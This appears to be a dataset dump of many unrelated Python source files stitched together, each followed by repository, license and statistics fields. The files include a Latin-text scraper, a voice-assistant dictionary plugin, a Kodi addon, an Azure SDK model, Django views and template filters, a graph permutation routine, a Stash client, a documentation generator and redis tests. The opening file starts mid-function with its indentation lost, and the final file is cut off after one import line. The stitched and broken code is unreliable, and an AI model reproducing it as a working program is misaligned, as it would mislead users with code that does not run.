colltitle = collSOUP.title.string.strip()
date = "no date found"
textsURL = [collURL]
with sqlite3.connect('texts.db') as db:
c = db.cursor()
c.execute(
'CREATE TABLE IF NOT EXISTS texts (id INTEGER PRIMARY KEY, title TEXT, book TEXT,'
' language TEXT, author TEXT, date TEXT, chapter TEXT, verse TEXT, passage TEXT,'
' link TEXT, documentType TEXT)')
c.execute("DELETE FROM texts WHERE title = 'REGULA AD MONACHOS I'")
c.execute("DELETE FROM texts WHERE title = 'SS. PATRUM REGULA AD MONACHOS II.'")
c.execute("DELETE FROM texts WHERE title = 'SS. PATRUM REGULA AD MONACHOS III.'")
c.execute("DELETE FROM texts WHERE title = 'REGULA ORIENTALIS\nEX PATRUM ORIENTALIUM REGULIS COLLECTA'")
for url in textsURL:
chapter = "Preface"
verse = 0
title = "REGULA AD MONACHOS I"
openurl = urllib.request.urlopen(url)
textsoup = BeautifulSoup(openurl, 'html5lib')
getp = textsoup.find_all('p')
for p in getp:
# make sure it's not a paragraph without the main text
try:
if p['class'][0].lower() in ['border', 'pagehead', 'shortborder', 'smallborder', 'margin',
'internal_navigation']: # these are not part of the main t
continue
except:
pass
verses = []
text = p.get_text()
text = text.strip()
if p.find('b') is not None:
if text.startswith("SS.") or text.startswith("REGULA"):
# this is the title of a new work
title = text
chapter = -1
continue
else:
if text.startswith("CAPUT"):
chapter = text
print(chapter)
verse = 0
continue
else:
chapter = chapter + ": " + text
continue
if title == "REGULA AD MONACHOS I":
verses.append(text)
elif text.startswith("PRAEFATIO"):
chapter = text
verse = 0
continue
elif re.match('[IVXL]+\.', text):
chapter = text.split(" ")[0].strip()
print(chapter)
verse = 0
text = text.replace(chapter, '')
verses.append(text)
else:
verses.append(text)
for v in verses:
if v.startswith('Christian'):
continue
if v is None or v == '' or v.isspace():
continue
# verse number assignment.
verse += 1
c.execute("INSERT INTO texts VALUES (?,?,?,?,?,?,?, ?, ?, ?, ?)",
(None, colltitle, title, 'Latin', author, date, chapter,
verse, v, url, 'prose'))
if __name__ == '__main__':
main()
|
apache-2.0
| 730,117,628,980,353,400
| 36.277228
| 112
| 0.468526
| false
| 4.585871
| false
| false
| false
|
iamjake648/jasper-dictionary
|
Define.py
|
1
|
1593
|
#Written by Jake Schultz
#TODO Add more lang support, limit number of results returned
import re
from urllib2 import Request, urlopen, URLError
import json
WORDS = ["DEFINE","WHAT DOES %S MEAN","DEFINITION", "WHAT IS [A|AN]? %S"]
PRIORITY = 1
def handle(text, mic, profile, recursive=False):
text = re.sub(r"(?i)(define|(what is the\s)?definition of|what does|mean|what is (a|an)?)\b","", text ).strip()
if len(text) != 0:
#Yandex Dictionary API Key
dict_key = profile['keys']['YANDEX_DICT']
#method to get the def
get_def(text,mic,dict_key)
elif not recursive:
mic.say("What word would you like to define?")
handle(mic.activeListen(), mic, profile, True)
def get_def(text,mic,key):
#make a call to the API
request = Request('https://dictionary.yandex.net/api/v1/dicservice.json/lookup?key='+key+'&lang=en-en&text='+text)
try:
response = urlopen(request)
data = json.load(response)
if len(data["def"]) == 0:
mic.say("I could not find a definition for " + str(text))
else:
#get the word type (noun, verb, ect)
word_type = data["def"][0]["pos"]
mic.say("The word is a " + word_type)
defs = data["def"][0]["tr"]
#loop through the definitions
for text in defs:
mic.say(text["text"])
except URLError, e:
mic.say("Unable to reach dictionary API.")
def isValid(text):
return bool(re.search(r'\Define|what does\s(.*?)\smean|Definition|what is\s\w+\b',text, re.IGNORECASE))
|
gpl-2.0
| 1,097,689,116,695,614,700
| 34.4
| 118
| 0.603264
| false
| 3.346639
| false
| false
| false
|
felipenaselva/repo.felipe
|
plugin.video.uwc/k18.py
|
1
|
2513
|
'''
Ultimate Whitecream
Copyright (C) 2015 mortael
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import urllib, urllib2, re, cookielib, os.path, sys, socket
import xbmc, xbmcplugin, xbmcgui, xbmcaddon
import utils
#230: k18.Main()
#231: k18.List(url)
#232: k18.Playvid(url, name, download)
#233: k18.Cat(url)
#234: k18.Search(url, keyword)
progress = utils.progress
def Main():
utils.addDir('[COLOR hotpink]Categories[/COLOR]','http://k18.co/',233,'','')
utils.addDir('[COLOR hotpink]Search[/COLOR]','http://k18.co/?s=',234,'','')
List('http://k18.co/page/1/')
xbmcplugin.endOfDirectory(utils.addon_handle)
def List(url):
listhtml = utils.getHtml(url, '')
match = re.compile(r'class="content-list-thumb">\s+<a href="([^"]+)" title="([^"]+)">.*?src="([^"]+)"', re.DOTALL | re.IGNORECASE).findall(listhtml)
for videopage, name, img in match:
name = utils.cleantext(name)
utils.addDownLink(name, videopage, 232, img, '')
try:
nextp=re.compile('next page-numbers" href="([^"]+)">»', re.DOTALL | re.IGNORECASE).findall(listhtml)[0]
utils.addDir('Next Page', nextp, 231,'')
except: pass
xbmcplugin.endOfDirectory(utils.addon_handle)
def Search(url, keyword=None):
searchUrl = url
if not keyword:
utils.searchDir(url, 234)
else:
title = keyword.replace(' ','+')
searchUrl = searchUrl + title
print "Searching URL: " + searchUrl
List(searchUrl)
def Cat(url):
cathtml = utils.getHtml(url, '')
match = re.compile('0" value="([^"]+)">([^<]+)<', re.DOTALL | re.IGNORECASE).findall(cathtml)
for catpage, name in match:
catpage = 'http://k18.co/?cat=' + catpage
utils.addDir(name, catpage, 231, '')
xbmcplugin.endOfDirectory(utils.addon_handle)
def Playvid(url, name, download=None):
utils.PLAYVIDEO(url, name, download)
|
gpl-2.0
| -4,485,078,390,973,765,600
| 32.959459
| 152
| 0.655392
| false
| 3.485437
| false
| false
| false
|
AutorestCI/azure-sdk-for-python
|
azure-mgmt-network/azure/mgmt/network/v2017_09_01/models/application_gateway_url_path_map.py
|
1
|
3397
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .sub_resource import SubResource
class ApplicationGatewayUrlPathMap(SubResource):
"""UrlPathMaps give a url path to the backend mapping information for
PathBasedRouting.
:param id: Resource ID.
:type id: str
:param default_backend_address_pool: Default backend address pool resource
of URL path map.
:type default_backend_address_pool:
~azure.mgmt.network.v2017_09_01.models.SubResource
:param default_backend_http_settings: Default backend http settings
resource of URL path map.
:type default_backend_http_settings:
~azure.mgmt.network.v2017_09_01.models.SubResource
:param default_redirect_configuration: Default redirect configuration
resource of URL path map.
:type default_redirect_configuration:
~azure.mgmt.network.v2017_09_01.models.SubResource
:param path_rules: Path rule of URL path map resource.
:type path_rules:
list[~azure.mgmt.network.v2017_09_01.models.ApplicationGatewayPathRule]
:param provisioning_state: Provisioning state of the backend http settings
resource. Possible values are: 'Updating', 'Deleting', and 'Failed'.
:type provisioning_state: str
:param name: Name of the resource that is unique within a resource group.
This name can be used to access the resource.
:type name: str
:param etag: A unique read-only string that changes whenever the resource
is updated.
:type etag: str
:param type: Type of the resource.
:type type: str
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'default_backend_address_pool': {'key': 'properties.defaultBackendAddressPool', 'type': 'SubResource'},
'default_backend_http_settings': {'key': 'properties.defaultBackendHttpSettings', 'type': 'SubResource'},
'default_redirect_configuration': {'key': 'properties.defaultRedirectConfiguration', 'type': 'SubResource'},
'path_rules': {'key': 'properties.pathRules', 'type': '[ApplicationGatewayPathRule]'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'etag': {'key': 'etag', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(self, id=None, default_backend_address_pool=None, default_backend_http_settings=None, default_redirect_configuration=None, path_rules=None, provisioning_state=None, name=None, etag=None, type=None):
super(ApplicationGatewayUrlPathMap, self).__init__(id=id)
self.default_backend_address_pool = default_backend_address_pool
self.default_backend_http_settings = default_backend_http_settings
self.default_redirect_configuration = default_redirect_configuration
self.path_rules = path_rules
self.provisioning_state = provisioning_state
self.name = name
self.etag = etag
self.type = type
|
mit
| -8,994,817,424,965,197,000
| 47.528571
| 215
| 0.664999
| false
| 4.137637
| true
| false
| false
|
chengdh/openerp-ktv
|
openerp/addons/ktv_sale/room_operate.py
|
1
|
3418
|
# -*- coding: utf-8 -*-
from osv import osv,fields
from room import room
class room_operate(osv.osv):
'''
包厢操作类:
以下操作都属于包厢操作:
1 预定
2 正常开房
3 买钟
4 买断
5 续钟
6 退钟
7 换房
8 并房
包厢通过cur_room_operate_id与room_operate相关联,用于标示当前包厢所对应的操作
room_operate与以上各个操作是one2many的关系,这样通过一个room_operate可以获取所有包厢在开房过程中所进行的操作,结账时遍历所有的操作并进行计算即可
'''
_name = "ktv.room_operate"
#由于在其他地方需要引用该对象,所有将name定义为bill_no
_rec_name = "bill_no"
_description = "包厢操作类,与包厢是many2one的关系"
_columns = {
"operate_date" : fields.datetime('operate_datetime',required = True),
"room_id" : fields.many2one('ktv.room','room_id',required = True),
"bill_no" : fields.char("bill_no",size = 64,required = True,help = "账单号"),
"room_scheduled_ids" : fields.one2many("ktv.room_scheduled","room_operate_id",help="预定信息列表"),
"room_opens_ids" : fields.one2many("ktv.room_opens","room_operate_id",help="开房信息列表"),
}
_defaults = {
'operate_date' : fields.datetime.now,
'bill_no': lambda obj, cr, uid, context: obj.pool.get('ir.sequence').get(cr, uid, 'ktv.room_operate'),
}
def process_operate(self,cr,uid,operate_values):
"""
包厢操作统一入口,调用不同业务类的操作
这样设计的好处是隔离了变化,如果需要修改服务端的逻辑,客户端的调用逻辑不用做任何修改
在客户端新增了业务实体调用,只用增加新的实体即可,其他不用做修改
在js端也需要封装同样的调用接口来隔离变化
:params room_id integer 包厢编码
:operate_values 前端传入的业务操作数据
:operate[osv_name] 要调用的实体业务对象名称,比如ktv.room_checkout
调用示例:
开房操作,返回三个参数 1 操作成功的实体对象 2 包厢应修改的状态 3 cron对象,用于处理对包厢的定时操作:
(operate_obj,room_state,cron) = self.pool.get(operate_values['osv_name']).process_operate(cr,uid,opeate_values)
更新当前包厢状态,添加cron对象,返回处理结果
"""
room_id = operate_values['room_id']
(operate_obj,room_state,cron) = self.pool.get(operate_values['osv_name']).process_operate(cr,uid,operate_values)
#更新包厢状态
self.pool.get('ktv.room').write(cr,uid,room_id,{'state' : room_state})
#TODO 添加cron对象
if cron:
self._create_operate_cron(cr,uid,cron)
room_fields = self.pool.get('ktv.room').fields_get(cr,uid).keys()
room = self.pool.get('ktv.room').read(cr,uid,room_id,room_fields)
#返回两个对象room和room_operate
return {'room' : room,'room_operate' : operate_obj}
def _create_operate_cron(self,cr,uid,cron_vals):
"""
创建cron定时执行任务,在需要定时执行关房任务时,需要执行
:params dict cron_vals 定时任务相关属性
"""
return self.pool.get('ir.cron').create(cr,uid,cron_vals)
|
agpl-3.0
| -4,107,985,104,135,844,400
| 35.166667
| 120
| 0.621352
| false
| 1.917526
| false
| false
| false
|
dhimmel/hetio
|
hetnetpy/permute.py
|
1
|
9110
|
import collections
import random
import logging
from hetnetpy.hetnet import Graph
def permute_graph(graph, multiplier=10, seed=0, metaedge_to_excluded=dict(), log=False):
"""
Derive a permuted hetnet from an input hetnet. This method applies the
XSwap algorithm separately for each metaedge. Hence, node degree is
preserved for each type of edge. However, edges are randomized / shuffled.
Users are recommended to interrogate the reported statistics to ensure that
edges appear to be sufficiently randomized. Primarily, the number of edges
of a given metaedge that remain unchanged from the original hetnet should
have reached an assymptote. If the number of unchanged edges has not yet
stabalized, further randomization is possible with this approach.
Parameters
----------
graph : hetnetpy.hetnet.Graph
Input hetnet to create a permuted derivative from
multiplier : int or float
This is multiplied by the number of edges for each metaedge to
determine the number of swaps to attempt.
seed : int
Seed to initialize Python random number generator. When creating many
permuted hetnets, it's recommended to increment this number, such that
each round of permutation shuffles edges in a different order.
metaedge_to_excluded : dict (metaedge -> set)
Edges to exclude. This argument has not been extensively used in
practice.
log : bool
Whether to log diagnostic INFO via python's logging module.
Returns
-------
permuted_graph : hetnetpy.hetnet.Graph
A permuted hetnet derived from the input graph.
stats : list of dicts
A list where each item is a dictionary of permutation statistics at a
checkpoint for a specific metaedge. These statistics allow tracking the
progress of the permutation as the number of attempted swaps increases.
"""
if log:
logging.info("Creating permuted graph template")
permuted_graph = Graph(graph.metagraph)
for (metanode_identifier, node_identifier), node in graph.node_dict.items():
permuted_graph.add_node(
metanode_identifier, node_identifier, name=node.name, data=node.data
)
if log:
logging.info("Retrieving graph edges")
metaedge_to_edges = graph.get_metaedge_to_edges(exclude_inverts=True)
if log:
logging.info("Adding permuted edges")
all_stats = list()
for metaedge, edges in metaedge_to_edges.items():
if log:
logging.info(metaedge)
excluded_pair_set = metaedge_to_excluded.get(metaedge, set())
pair_list = [(edge.source.get_id(), edge.target.get_id()) for edge in edges]
directed = metaedge.direction != "both"
permuted_pair_list, stats = permute_pair_list(
pair_list,
directed=directed,
multiplier=multiplier,
excluded_pair_set=excluded_pair_set,
seed=seed,
log=log,
)
for stat in stats:
stat["metaedge"] = metaedge
stat["abbrev"] = metaedge.abbrev
all_stats.extend(stats)
for pair in permuted_pair_list:
permuted_graph.add_edge(pair[0], pair[1], metaedge.kind, metaedge.direction)
return permuted_graph, all_stats
def permute_pair_list(
pair_list,
directed=False,
multiplier=10,
excluded_pair_set=set(),
seed=0,
log=False,
inplace=False,
):
"""
Permute edges (of a single type) in a graph according to the XSwap function
described in https://doi.org/f3mn58. This method selects two edges and
attempts to swap their endpoints. If the swap would result in a valid edge,
the swap proceeds. Otherwise, the swap is skipped. The end result is that
node degree is preserved, but edges are shuffled, thereby losing their
original meaning.
Parameters
----------
pair_list : list of tuples
List of edges to permute. Each edge is represented as a (source,
target) tuple. source and target represent nodes and can be any Python
objects that define __eq__. In other words, this function does not
assume any specific format for nodes. If the edges are from a bipartite
or directed graph, then all tuples must have the same alignment. For
example, if the edges represent the bipartite Compound-binds-Gene
relationship, all tuples should be of the form (compound, gene) and not
intermixed with (gene, compound) tuples. The only instance where order
of the source and target is not important is for an undirected edge
type where the source and target nodes are of the same type, such as
Gene-interacts-Gene.
directed : bool
Whether the edge should be considered directed. If False, a swap that
creates an a-b edge will be invalid if a b-a edge already exists.
multiplier : int or float
This is multiplied by the number of edges in pair_list to determine the
number of swaps to attempt.
excluded_pair_set : set of tuples:
Set of possible edges to forbid. If a swap would create an edge in this
set, it would be considered invalid and hence skipped.
seed : int
Seed to initialize Python random number generator.
log : bool
Whether to log diagnostic INFO via python's logging module.
inplace : bool
Whether to modify the edge list in place.
Returns
-------
pair_list : list of tuples
The permuted edges, derived from the input pair_list.
stats : list of dicts
A list where each item is a dictionary of permutation statistics at a
checkpoint. Statistics are collected at 10 checkpoints, spaced evenly
by the number of attempts.
"""
random.seed(seed)
if not inplace:
pair_list = pair_list.copy()
pair_set = set(pair_list)
assert len(pair_set) == len(pair_list)
edge_number = len(pair_list)
n_perm = int(edge_number * multiplier)
count_same_edge = 0
count_self_loop = 0
count_duplicate = 0
count_undir_dup = 0
count_excluded = 0
if log:
logging.info(
"{} edges, {} permutations (seed = {}, directed = {}, {} excluded_edges)".format(
edge_number, n_perm, seed, directed, len(excluded_pair_set)
)
)
orig_pair_set = pair_set.copy()
step = max(1, n_perm // 10)
print_at = list(range(step, n_perm, step)) + [n_perm - 1]
stats = list()
for i in range(n_perm):
# Same two random edges
i_0 = random.randrange(edge_number)
i_1 = random.randrange(edge_number)
# Same edge selected twice
if i_0 == i_1:
count_same_edge += 1
continue
pair_0 = pair_list.pop(i_0)
pair_1 = pair_list.pop(i_1 - 1 if i_0 < i_1 else i_1)
new_pair_0 = pair_0[0], pair_1[1]
new_pair_1 = pair_1[0], pair_0[1]
valid = False
for pair in new_pair_0, new_pair_1:
if pair[0] == pair[1]:
count_self_loop += 1
break # edge is a self-loop
if pair in pair_set:
count_duplicate += 1
break # edge is a duplicate
if not directed and (pair[1], pair[0]) in pair_set:
count_undir_dup += 1
break # edge is a duplicate
if pair in excluded_pair_set:
count_excluded += 1
break # edge is excluded
else:
# edge passed all validity conditions
valid = True
# If new edges are invalid
if not valid:
for pair in pair_0, pair_1:
pair_list.append(pair)
# If new edges are valid
else:
for pair in pair_0, pair_1:
pair_set.remove(pair)
for pair in new_pair_0, new_pair_1:
pair_set.add(pair)
pair_list.append(pair)
if i in print_at:
stat = collections.OrderedDict()
stat["cumulative_attempts"] = i
index = print_at.index(i)
stat["attempts"] = (
print_at[index] + 1
if index == 0
else print_at[index] - print_at[index - 1]
)
stat["complete"] = (i + 1) / n_perm
stat["unchanged"] = len(orig_pair_set & pair_set) / len(pair_set)
stat["same_edge"] = count_same_edge / stat["attempts"]
stat["self_loop"] = count_self_loop / stat["attempts"]
stat["duplicate"] = count_duplicate / stat["attempts"]
stat["undirected_duplicate"] = count_undir_dup / stat["attempts"]
stat["excluded"] = count_excluded / stat["attempts"]
stats.append(stat)
count_same_edge = 0
count_self_loop = 0
count_duplicate = 0
count_undir_dup = 0
count_excluded = 0
assert len(pair_set) == edge_number
return pair_list, stats
|
cc0-1.0
| 7,102,797,442,596,513,000
| 36.03252
| 93
| 0.615038
| false
| 4.083371
| false
| false
| false
|
coetzeevs/chiron
|
mysite/polls/views.py
|
1
|
1976
|
from django.shortcuts import render, get_object_or_404
from django.http import HttpResponse, HttpResponseRedirect
from django.template import loader
from .models import Question, Choice
from django.urls import reverse
from django.views import generic
from django.utils import timezone
from django.core.mail import EmailMessage
from django.conf import settings
class IndexView(generic.ListView):
template_name = 'polls/index.html'
context_object_name = 'latest_question_list'
def get_queryset(self):
"""
Return the last five published questions (not including those set to be
published in the future).
"""
return Question.objects.filter(
pub_date__lte=timezone.now()
).order_by('-pub_date')[:5]
class DetailView(generic.DetailView):
model = Question
template_name = 'polls/detail.html'
def get_queryset(self):
"""
Excludes any questions that aren't published yet.
"""
return Question.objects.filter(pub_date__lte=timezone.now())
class ResultsView(generic.DetailView):
model = Question
template_name = 'polls/results.html'
def email(request):
email = EmailMessage('hello', 'Hello Johan, Minder OLX en meer ChiChi',settings.EMAIL_HOST_USER, to=['johan.duplessis@olx.com'])
email.send()
return HttpResponse("Hello, world. You're at the polls index.")
def vote(request, question_id):
question = get_object_or_404(Question, pk=question_id)
try:
selected_choice = question.choice_set.get(pk=request.POST['choice'])
except (KeyError, Choice.DoesNotExist):
# Redisplay the question voting form.
return render(request, 'polls/detail.html', {
'question': question,
'error_message': "You didn't select a choice.",
})
else:
selected_choice.votes += 1
selected_choice.save()
# Always return an HttpResponseRedirect after successfully dealing
# with POST data. This prevents data from being posted twice if a
# user hits the Back button.
return HttpResponseRedirect(reverse('polls:results', args=(question.id,)))
|
mit
| -8,582,128,274,714,350,000
| 30.380952
| 130
| 0.745951
| false
| 3.509769
| false
| false
| false
|
LACNIC/simon
|
simon-web/simon_app/templatetags/simon_extras.py
|
1
|
2401
|
from django import template
from datetime import datetime
from simon_app.functions import GMTUY
import operator
"""
Module that holds the Simon
"""
register = template.Library()
@register.filter(name="substract")
def substract(value, arg):
"""
Substract
"""
return value - arg
@register.filter(name="divide")
def divide(value, arg):
"""
Float division
"""
return float(value) / float(arg)
@register.filter(name="percentage")
def percentage(value, arg):
"""
Percentage
"""
return 100.0 * divide(value, arg)
@register.filter(name="unit_shortener")
def unit_shortener(value):
"""
Unit converter
"""
try:
int(value)
float(value)
except:
return "N/A"
K = 1000
M = K * K
G = K * M
T = K * G
if value > T:
return "%.1f %s" % (1.0 * value / T, 'T')
if value > G:
return "%.1f %s" % (1.0 * value / G, 'G')
if value > M:
return "%.1f %s" % (1.0 * value / M, 'M')
if value > K:
return "%.1f %s" % (1.0 * value / K, 'K')
return value
@register.filter(name="time_since")
def time_since(value):
"""
:param now:
:return:
"""
td = datetime.now(GMTUY()) - value
print td
if td.days > 1:
return "mas de un dia"
elif td.seconds > 3600:
mins = "%.0f minutos" % ((td.seconds % 3600) / 60)
horas = "%.0f %s" % (td.seconds / 3600, "horas" if td.seconds / 3600 > 1 else "hora")
return "%s %s" % (horas, mins)
elif td.seconds > 60:
return "%.0f minutos" % (td.seconds / 60)
else:
return "%.0f segundos" % td.seconds
@register.filter(name="max")
def max_(value, arg):
"""
:param value:
:param arg:
:return:
"""
if arg == 'v6_rate':
return str(max([v.v6_rate for v in value]))
return "%s %s" % (value, arg)
@register.filter(name="get_by_attribute")
def get_by_attribute(objects, raw_args):
print raw_args
key, value = raw_args.split(' ')
print key, value
func = operator.attrgetter(key)
for o in objects:
if func(o) == value:
return o
class Object():
pass
a = Object()
setattr(a, key, 0)
return a
@register.filter(name="get_attribute")
def get_attribute(object, attr):
func = operator.attrgetter(attr)
return func(object)
|
gpl-2.0
| 4,992,362,165,801,028,000
| 18.208
| 93
| 0.548105
| false
| 3.222819
| false
| false
| false
|
gpailler/AtlassianBot
|
plugins/stash.py
|
1
|
1971
|
# coding: utf-8
import requests
from utils import rest
class Stash(object):
def __init__(self, server):
self.__server = server
def get_stash_branches(self, repos, project, filter):
results = []
for repo in repos:
path = '/rest/api/1.0/projects/{project}/repos/{repo}/branches'\
.format(project=project, repo=repo)
data = {
'filterText': filter,
'details': True,
'limit': 100
}
request = rest.get(self.__server, path, data)
for result in request.json()['values']:
results.append((
repo,
result['id'],
result['displayId'],
result['latestChangeset']))
return results
def branch_merged(self, project, basebranches, repo, branch):
for to in basebranches:
path = ('/rest/api/1.0/projects/{project}/repos/{repo}/'
'compare/changes/').format(project=project, repo=repo)
data = {
'from': branch,
'to': to,
'limit': 1
}
request = rest.get(self.__server, path, data)
if request.status_code != requests.codes.ok:
raise Exception(request.text)
else:
if request.json()['size'] == 0:
return True
return False
def remove_git_branches(self, project, repo, branchkey, changeset):
path = ('/rest/branch-utils/1.0/projects/{project}/repos/{repo}/'
'branches').format(project=project, repo=repo)
data = {
'name': branchkey,
'endPoint': changeset,
'dryRun': False
}
request = rest.delete(self.__server, path, data)
if request.status_code != requests.codes.no_content:
raise Exception(request.text)
|
mit
| -3,836,757,531,418,483,700
| 30.790323
| 76
| 0.499239
| false
| 4.489749
| false
| false
| false
|
samdoshi/teletype
|
utils/docs.py
|
1
|
6073
|
#!/usr/bin/env python3
import sys
from pathlib import Path
import jinja2
import pypandoc
import pytoml as toml
from common import list_ops, list_mods, validate_toml, get_tt_version
if (sys.version_info.major, sys.version_info.minor) < (3, 6):
raise Exception("need Python 3.6 or later")
THIS_FILE = Path(__file__).resolve()
ROOT_DIR = THIS_FILE.parent.parent
TEMPLATE_DIR = ROOT_DIR / "utils" / "templates"
DOCS_DIR = ROOT_DIR / "docs"
OP_DOCS_DIR = DOCS_DIR / "ops"
FONTS_DIR = ROOT_DIR / "utils" / "fonts"
TT_VERSION = get_tt_version()
VERSION_STR = " ".join(["Teletype", TT_VERSION["tag"], TT_VERSION["hash"],
"Documentation"])
env = jinja2.Environment(
autoescape=False,
loader=jinja2.FileSystemLoader(str(TEMPLATE_DIR)),
trim_blocks=True,
lstrip_blocks=True,
cache_size=0,
auto_reload=True
)
# determines the order in which sections are displayed
OPS_SECTIONS = [
"variables",
"hardware",
"patterns",
"controlflow",
"maths",
"metronome",
"delay",
"stack",
"queue",
"turtle",
"grid",
"ansible",
"whitewhale",
"meadowphysics",
"earthsea",
"orca",
"justfriends",
"telex_i",
"telex_o",
"er301",
"fader",
"wslash",
"matrixarchate"
]
def deep_merge_dict(source, destination):
for key, value in source.items():
if isinstance(value, dict):
node = destination.setdefault(key, {})
deep_merge_dict(value, node)
else:
destination[key] = value
return destination
def common_md():
print(f"Pandoc version: {pypandoc.get_pandoc_version()}")
print(f"Using docs directory: {DOCS_DIR}")
print(f"Using ops docs directory: {OP_DOCS_DIR}")
print()
op_table_template = env.get_template("op_table.jinja2.md")
op_extended_template = env.get_template("op_extended.jinja2.md")
output = ""
output += Path(DOCS_DIR / "intro.md") \
.read_text().replace("VERSION", TT_VERSION["tag"][1:]) + "\n\n"
output += Path(DOCS_DIR / "whats_new.md").read_text() + "\n\n"
output += Path(DOCS_DIR / "quickstart.md").read_text() + "\n\n"
output += Path(DOCS_DIR / "keys.md").read_text() + "\n\n"
output += Path(DOCS_DIR / "ops.md").read_text() + "\n\n"
all_ops = set(list_ops()) | set(list_mods())
all_ops_dict = {}
ops_with_docs = set()
for section in OPS_SECTIONS:
md_file = Path(OP_DOCS_DIR, section + ".md")
toml_file = Path(OP_DOCS_DIR, section + ".toml")
output += "\\newpage\n"
if md_file.exists() and md_file.is_file():
print(f"Reading {md_file}")
output += md_file.read_text() + "\n\n"
output += "\n"
if toml_file.exists() and toml_file.is_file():
print(f"Reading {toml_file}")
extended = []
# n.b. Python 3.6 dicts maintain insertion order
ops = toml.loads(toml_file.read_text())
validate_toml(ops)
deep_merge_dict(ops, all_ops_dict)
for key in ops:
if key not in all_ops:
print(f" - WARNING: unknown {key}")
ops_with_docs.add(key)
if "aliases" in ops[key]:
ops_with_docs |= set(ops[key]["aliases"])
if "description" in ops[key]:
render = op_extended_template.render(name=key, **ops[key])
extended.append((key, render))
output += op_table_template.render(ops=ops.values())
output += "\n"
output += "\n".join([e[1] for e in extended]) + "\n\n"
output += Path(DOCS_DIR / "advanced.md").read_text() + "\n\n"
output += "\\appendix\n\n"
output += "# Alphabetical list of OPs and MODs\n\n"
sorted_ops = [kv[1] for kv in sorted(all_ops_dict.items())]
output += op_table_template.render(ops=sorted_ops)
output += "\n\n# Missing documentation\n\n"
missing_ops = all_ops - ops_with_docs
output += ", ".join([f"`{o}`" for o in sorted(missing_ops)]) + "\n\n"
output += Path(ROOT_DIR / "CHANGELOG.md").read_text() + "\n\n"
return output
def main():
if len(sys.argv) <= 1:
sys.exit("Please supply a filename")
input_format = "markdown"
output = common_md()
print()
for arg in sys.argv[1:]:
p = Path(arg).resolve()
print(f"Generating: {p}")
ext = p.suffix
if ext == ".md":
p.write_text(output)
elif ext == ".html":
output = "# " + VERSION_STR + "\n\n" + output
pypandoc.convert_text(
output,
format=input_format,
to="html5",
outputfile=str(p),
extra_args=["--standalone",
"--self-contained",
"--toc",
"--toc-depth=2",
"--css=" + str(TEMPLATE_DIR / "docs.css"),
"--template=" + str(TEMPLATE_DIR /
"template.html5")])
elif ext == ".pdf" or ext == ".tex":
latex_preamble = env.get_template("latex_preamble.jinja2.md")
latex = latex_preamble \
.render(title=VERSION_STR, fonts_dir=FONTS_DIR) + "\n\n"
latex += output
pandoc_version = int(pypandoc.get_pandoc_version()[0])
engine = ("--pdf-engine=xelatex"
if pandoc_version >= 2
else "--latex-engine=xelatex")
pypandoc.convert_text(
latex,
format=input_format,
to=ext[1:],
outputfile=str(p),
extra_args=["--standalone",
"--column=80",
"--toc",
"--toc-depth=2",
engine,
"--variable=papersize:A4"])
if __name__ == "__main__":
main()
|
gpl-2.0
| -4,714,646,216,518,015,000
| 29.671717
| 78
| 0.513091
| false
| 3.526713
| false
| false
| false
|
mylokin/redisext
|
tests/test_expire.py
|
1
|
1260
|
from __future__ import absolute_import
import redisext.counter
import redisext.key
import redisext.serializer
from . import fixture
class ExpireCounter(redisext.counter.Counter, redisext.key.Expire):
EXPIRE = 60
CONNECTION = fixture.Connection
SERIALIZER = redisext.serializer.Numeric
class ExpireCounterTestCase(fixture.TestCase):
def setUp(self):
self.counter = ExpireCounter('key')
self.counter.incr()
self.counter.expire()
def test_expire(self):
self.assertTrue(60 >= self.counter.ttl() > 0)
def test_persist(self):
self.counter.persist()
self.assertEqual(self.counter.ttl(), -1)
class UnspecifiedExpireCounter(redisext.counter.Counter, redisext.key.Expire):
CONNECTION = fixture.Connection
SERIALIZER = redisext.serializer.Numeric
class UnspecifiedExpireCounterTestCase(fixture.TestCase):
def setUp(self):
self.counter = UnspecifiedExpireCounter('key')
def test_expire_unspecified(self):
self.counter.incr()
with self.assertRaises(ValueError):
self.counter.expire()
def test_expire_specified(self):
self.counter.incr()
self.counter.expire(60)
self.assertTrue(60 >= self.counter.ttl() > 0)
|
mit
| -488,243,151,904,911,100
| 25.808511
| 78
| 0.694444
| false
| 3.631124
| true
| false
| false
|
Instanssi/Instanssi.org
|
Instanssi/screenshow/migrations/0003_auto_20210511_0020.py
|
1
|
1515
|
# Generated by Django 3.2.2 on 2021-05-10 21:20
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('screenshow', '0002_auto_20180711_2110'),
]
operations = [
migrations.AlterField(
model_name='ircmessage',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='message',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='npsong',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='playlistvideo',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='screenconfig',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='sponsor',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
]
|
mit
| -6,303,775,865,883,706,000
| 34.232558
| 111
| 0.588779
| false
| 4.139344
| false
| false
| false
|
tabalinas/jsgrid-django
|
clients/views.py
|
1
|
1522
|
from django.http import HttpResponse
